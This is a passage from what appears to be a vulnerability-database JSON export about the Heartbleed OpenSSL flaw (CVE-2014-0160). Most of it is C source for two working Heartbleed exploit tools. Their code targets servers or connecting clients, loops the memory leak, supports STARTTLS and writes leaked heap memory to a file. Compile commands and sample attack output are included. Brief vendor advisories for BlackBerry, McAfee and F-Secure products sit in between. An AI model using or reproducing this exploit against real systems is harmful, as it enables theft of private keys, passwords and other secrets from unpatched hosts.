write\\n");\r\n\t}\r\n\r\n\t\t\tdtls1_stop_timer(c->sslHandle);\r\n\t\t\tc->sslHandle->tlsext_hb_seq++;\r\n\t\t\tc->sslHandle->tlsext_hb_pending = 0;\r\n\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\nstatic DTLS1_BITMAP *\r\ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch)\r\n {\r\n \r\n *is_next_epoch = 0;\r\n\r\n if (rr->epoch == s->d1->r_epoch)\r\n return &s->d1->bitmap;\r\n\r\n else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&\r\n (rr->type == SSL3_RT_HANDSHAKE ||\r\n rr->type == SSL3_RT_ALERT))\r\n {\r\n *is_next_epoch = 1;\r\n return &s->d1->next_bitmap;\r\n }\r\n\r\n return NULL;\r\n }\r\n\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)\r\n\t{\r\n\tint cmp;\r\n\tunsigned int shift;\r\n\tconst unsigned char *seq = s->s3->read_sequence;\r\n\r\n\tcmp = satsub64be(seq,bitmap->max_seq_num);\r\n\tif (cmp > 0)\r\n\t\t{\r\n\t\tmemcpy (s->s3->rrec.seq_num,seq,8);\r\n\t\treturn 1;\r\n\t\t}\r\n\tshift = -cmp;\r\n\tif (shift >= sizeof(bitmap->map)*8)\r\n\t\treturn 0;\r\n\telse if (bitmap->map & (1UL<<shift))\r\n\t\treturn 0;\r\n\r\n\tmemcpy (s->s3->rrec.seq_num,seq,8);\r\n\treturn 1;\r\n\t}\r\n\r\nint satsub64be(const unsigned char *v1,const unsigned char *v2)\r\n{\tint ret,sat,brw,i;\r\n\r\n\tif (sizeof(long) == 8) do\r\n\t{\tconst union { long one; char little; } is_endian = {1};\r\n\t\tlong l;\r\n\r\n\t\tif (is_endian.little)\t\t\tbreak;\r\n\r\n\t\tif (((size_t)v1|(size_t)v2)&0x7)\tbreak;\r\n\r\n\t\tl = *((long *)v1);\r\n\t\tl -= *((long *)v2);\r\n\t\tif (l>128)\t\treturn 128;\r\n\t\telse if (l<-128)\treturn -128;\r\n\t\telse\t\t\treturn (int)l;\r\n\t} while (0);\r\n\r\n\tret = (int)v1[7]-(int)v2[7];\r\n\tsat = 0;\r\n\tbrw = ret>>8;\r\n\tif (ret & 0x80)\r\n\t{\tfor (i=6;i>=0;i--)\r\n\t\t{\tbrw += (int)v1[i]-(int)v2[i];\r\n\t\t\tsat |= ~brw;\r\n\t\t\tbrw >>= 8;\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\tfor (i=6;i>=0;i--)\r\n\t\t{\tbrw += (int)v1[i]-(int)v2[i];\r\n\t\t\tsat |= brw;\r\n\t\t\tbrw >>= 8;\r\n\t\t}\r\n\t}\r\n\tbrw <<= 8;\r\n\r\n\tif (sat&0xff)\treturn brw | 0x80;\r\n\telse\t\treturn brw + (ret&0xFF);\r\n}\r\n\r\nstatic int\r\ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)\r\n\t{\r\n\tDTLS1_RECORD_DATA *rdata;\r\n\tpitem *item;\r\n\r\n\tif (pqueue_size(queue->q) >= 100)\r\n\t\treturn 0;\r\n\t\t\r\n\trdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));\r\n\titem = pitem_new(priority, rdata);\r\n\tif (rdata == NULL || item == NULL)\r\n\t\t{\r\n\t\tif (rdata != NULL) OPENSSL_free(rdata);\r\n\t\tif (item != NULL) pitem_free(item);\r\n\t\t\r\n\t\tSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n\t\treturn(0);\r\n\t\t}\r\n\t\r\n\trdata->packet = s->packet;\r\n\trdata->packet_length = s->packet_length;\r\n\tmemcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));\r\n\tmemcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));\r\n\r\n\titem->data = rdata;\r\n\r\n#ifndef OPENSSL_NO_SCTP\r\n\tif (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&\r\n\t (s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {\r\n\t\tBIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);\r\n\t}\r\n#endif\r\n\r\n\tif (pqueue_insert(queue->q, item) == NULL)\r\n\t\t{\r\n\t\tOPENSSL_free(rdata);\r\n\t\tpitem_free(item);\r\n\t\treturn(0);\r\n\t\t}\r\n\r\n\ts->packet = NULL;\r\n\ts->packet_length = 0;\r\n\tmemset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));\r\n\tmemset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));\r\n\t\r\n\tif (!ssl3_setup_buffers(s))\r\n\t\t{\r\n\t\tSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n\t\tOPENSSL_free(rdata);\r\n\t\tpitem_free(item);\r\n\t\treturn(0);\r\n\t\t}\r\n\t\r\n\treturn(1);\r\n\t}\r\n\r\n\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)\r\n\t{\r\n\tint cmp;\r\n\tunsigned int shift;\r\n\tconst unsigned char *seq = s->s3->read_sequence;\r\n\r\n\tcmp = satsub64be(seq,bitmap->max_seq_num);\r\n\tif (cmp > 0)\r\n\t\t{\r\n\t\tshift = cmp;\r\n\t\tif (shift < sizeof(bitmap->map)*8)\r\n\t\t\tbitmap->map <<= shift, bitmap->map |= 1UL;\r\n\t\telse\r\n\t\t\tbitmap->map = 1UL;\r\n\t\tmemcpy(bitmap->max_seq_num,seq,8);\r\n\t\t}\r\n\telse\t{\r\n\t\tshift = -cmp;\r\n\t\tif (shift < sizeof(bitmap->map)*8)\r\n\t\t\tbitmap->map |= 1UL<<shift;\r\n\t\t}\r\n\t}\r\n\r\n\r\nvoid usage(){\r\n\tprintf("[\\n");\r\n\tprintf("[ --server|-s <ip/dns> - the server to target\\n");\r\n\tprintf("[ --port|-p <port> - the port to target\\n");\r\n\tprintf("[ --file|-f <filename> - file to write data to\\n");\r\n\tprintf("[ --bind|-b <ip> - bind to ip for exploiting clients\\n");\r\n\tprintf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n");\r\n\tprintf("[\t\t\t 0 = SMTP\\n");\r\n\tprintf("[\t\t\t 1 = POP3\\n");\r\n\tprintf("[\t\t\t 2 = IMAP\\n");\r\n\tprintf("[ --loop|-l\t\t - loop the exploit attempts\\n");\r\n\tprintf("[ --type|-t <n> - select exploit to try\\n");\r\n\tprintf("[ 0 = null length\\n");\r\n\tprintf("[\t\t\t 1 = max leak\\n");\r\n\tprintf("[\t\t\t n = heartbeat payload_length\\n");\r\n\tprintf("[ --udp|-u - use dtls/udp\\n");\r\n\tprintf("[\\n");\r\n\tprintf("[ --verbose|-v - output leak to screen\\n");\r\n\tprintf("[ --help|-h - this output\\n");\r\n\tprintf("[\\n");\r\n\texit(0);\r\n}\r\n\r\nint main(int argc, char* argv[]){\r\n\tint ret, port, userc, index;\r\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n\tint loop = 0;\r\n\tstruct hostent *h;\r\n\tconnection* c;\r\n\tchar *host, *file;\r\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n\tprintf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n");\r\n\tprintf("[ =============================================================\\n");\r\n static struct option options[] = {\r\n \t{"server", 1, 0, 's'},\r\n\t {"port", 1, 0, 'p'},\r\n\t\t{"file", 1, 0, 'f'},\r\n\t\t{"type", 1, 0, 't'},\r\n\t\t{"bind", 1, 0, 'b'},\r\n\t\t{"verbose", 0, 0, 'v'},\r\n\t\t{"precmd", 1, 0, 'c'},\r\n\t\t{"loop", 0, 0, 'l'},\r\n\t\t{"help", 0, 0,'h'},\r\n\t\t{"udp", 0, 0, 'u'}\r\n };\r\n\twhile(userc != -1) {\r\n\t userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvhu",options,&index);\t\r\n \tswitch(userc) {\r\n \t\tcase -1:\r\n\t break;\r\n \t case 's':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\r\n\t\t\t\t\tif(h==NULL){\r\n\t\t\t\t\t\tprintf("[!] FATAL: unknown host '%s'\\n",optarg);\r\n\t\t\t\t\t\texit(1);\r\n\t\t\t\t\t}\r\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(host==NULL){\r\n \t\t\t\tprintf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n \t\t\t}\r\n\t\t\t\tbreak;\r\n\t case 'p':\r\n\t\t\t\tif(iport==0){\r\n\t\t\t\t\tport = atoi(optarg);\r\n\t\t\t\t\tiport = 1;\r\n\t\t\t\t}\r\n \t break;\r\n\t\t\tcase 'f':\r\n\t\t\t\tif(ifile==0){\r\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(file==NULL){\r\n\t\t\t\t printf("[ error in malloc()\\n");\r\n \t\t\t\texit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(file,"%s",optarg);\r\n\t\t\t\t\tifile = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 't':\r\n\t\t\t\tif(itype==0){\r\n\t\t\t\t\ttype = atoi(optarg);\r\n\t\t\t\t\titype = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'h':\r\n\t\t\t\tusage();\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'b':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\r\n\t\t\t\t\tif(host==NULL){\r\n\t\t\t \t printf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n\t\t\t\t }\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n\t\t\t\t\tbind = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'c':\r\n\t\t\t\tif(iprecmd == 0){\r\n\t\t\t\t\tiprecmd = 1;\r\n\t\t\t\t\tprecmd = atoi(optarg);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'v':\r\n\t\t\t\tverbose = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'l':\r\n\t\t\t\tloop = 1;\r\n\t\t\t\tbreak;\r\n \t case 'u':\r\n\t\t\t\tudp = 1;\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tdefault:\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif(ihost==0||iport==0||ifile==0||itype==0){\r\n\t\tprintf("[ try --help\\n");\r\n\t\texit(0);\r\n\t}\r\n\tssl_init();\r\n\tif(bind==0){\r\n\t\tif (udp){\r\n\t\t\tc = dtls_client(ret, host, port);\r\n\t\t\tdtlsheartbleed(c, type);\r\n\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t\twhile(loop==1){\r\n\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\tfirst=0;\r\n\t\t\t\trepeat=1;\r\n\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\telse {\r\n\t\t\tret = tcp_connect(host, port);\r\n\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\tc = tls_connect(ret);\r\n\t\t\theartbleed(c,type);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t\twhile(loop==1){\r\n\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\tfirst=0;\r\n\t\t\t\trepeat=1;\r\n\t\t\t\theartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tSSL_shutdown(c->sslHandle);\r\n\t\tclose (ret);\r\n\t\tSSL_free(c->sslHandle);\r\n\t}\r\n\telse{\r\n\t\tint sd, pid, i;\r\n\t\tif (udp) {\r\n\t\t\tc = dtls_server(sd, host, port);\r\n\t\t\twhile (1) {\r\n\t\t\t\tchar * bytes = malloc(1024);\r\n\t\t\t\tstruct sockaddr_in peer;\r\n\t\t\t\tsocklen_t len = sizeof(peer);\r\n\t\t\t\t\tif (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) {\r\n\t\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\twhile(loop==1){\r\n\t\t\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\t\t\tfirst=0;\r\n\t\t\t\t\t\t\trepeat=0;\r\n\t\t\t\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\telse {\r\n\t\t\tret = tcp_bind(host, port);\r\n\t\t\twhile(1){\r\n\t \t\t\tsd=accept(ret,0,0);\r\n\t\t\t\tif(sd==-1){\r\n\t\t\t\t\tprintf("[!] FATAL: problem with accept()\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tif(pid=fork()){\r\n\t\t\t\t\tclose(sd);\r\n\t\t\t\t}\r\n\t \t\t\telse{\r\n\t\t\t\t\tc = tls_bind(sd);\r\n\t\t\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t}\r\n\t\t\t\t\twhile(loop==1){\r\n\t\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\t\tfirst=0;\r\n\t\t\t\t\t\trepeat=0;\r\n\t\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\tprintf("[ done.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-86255", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:21", "description": "CVE ID:CVE-2014-0160\r\n\r\nBlackBerry Link\u662f\u9ed1\u8393\u8bbe\u5907\u7684\u540c\u6b65\u8f6f\u4ef6\u3002\r\n\r\nBlackBerry Link\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nBlackBerry Link 1.x\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.blackberry.com", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "BlackBerry Link OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62182", "id": "SSV:62182", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:30", "description": "CVE ID:CVE-2014-0160\r\n\r\nMcAfee Email Gateway\u662f\u4e00\u6b3e\u5168\u9762\u7684\u7535\u5b50\u90ae\u4ef6\u5b89\u5168\u89e3\u51b3\u65b9\u6848\u3002\r\n\r\nMcAfee Email Gateway\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nMcAfee Email Gateway 7.x\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://kc.mcafee.com/corporate/index?page=content&id=SB10071", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "McAfee Email Gateway OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62192", "id": "SSV:62192", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:26", "description": "CVE ID:CVE-2014-0160\r\n\r\nF-Secure E-mail/Server Security/F-Secure Server Security\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nF-Secure E-mail/Server Security/F-Secure Server Security\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nF-Secure E-mail and Server Security 10.x\r\nF-Secure E-mail and Server Security 11.x\r\nF-Secure Server Security 10.x\r\nF-Secure Server Security 11.x\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.f-secure.com/en/web/labs_global/fsc-2014-1", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "F-Secure E-mail/Server Security OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62185", "id": "SSV:62185", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T14:03:33", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Heartbleed OpenSSL - Information Leak Exploit (1)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86061", "id": "SSV:86061", "sourceData": "\n /* \r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted \r\n* and wrote to a file to annoy IDS/forensics. The exploit can \r\n* set heartbeat payload length arbitrarily or use two preset \r\n* values for NULL and MAX length. The vulnerability occurs due \r\n* to bounds checking not being performed on a heap value which \r\n* is user supplied and returned to the user as part of DTLS/TLS \r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \r\n* 1.0.1f are known affected. You must run this against a target \r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks upto 65535 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size. \r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto" \r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* http://www.mdsec.co.uk\r\n*\r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n\r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n\t\t(((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n\t\t c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n\r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n\r\ntypedef struct {\r\n\tint socket;\r\n\tSSL *sslHandle;\r\n\tSSL_CTX *sslContext;\r\n} connection;\r\n\r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n\r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n\r\nint tcp_connect(char* server,int port){\r\n\tint sd,ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n\tprintf("[ connecting to %s %d/tcp\\n",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n\tif(ret==0){\r\n\t\tprintf("[ connected to %s %d/tcp\\n",server,port);\r\n\t}\r\n\telse{\r\n\t\tprintf("[!] FATAL: could not connect to %s %d/tcp\\n",server,port);\r\n\t\texit(0);\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nint tcp_bind(char* server, int port){\r\n\tint sd, ret, val=1;\r\n\tstruct sockaddr_in sin;\r\n\tstruct hostent *host;\r\n\thost = gethostbyname(server);\r\n\tsd=socket(AF_INET,SOCK_STREAM,0);\r\n\tif(sd==-1){\r\n \t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tmemset(&sin,0,sizeof(sin));\r\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\r\n\tsin.sin_family=AF_INET;\r\n\tsin.sin_port=htons(port);\r\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n\tif(ret==-1){\r\n\t\tprintf("[!] cannot bind socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tlisten(sd,5);\r\n\treturn(sd);\r\n}\r\n\r\n\r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n\r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n\tc = malloc(sizeof(connection));\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try 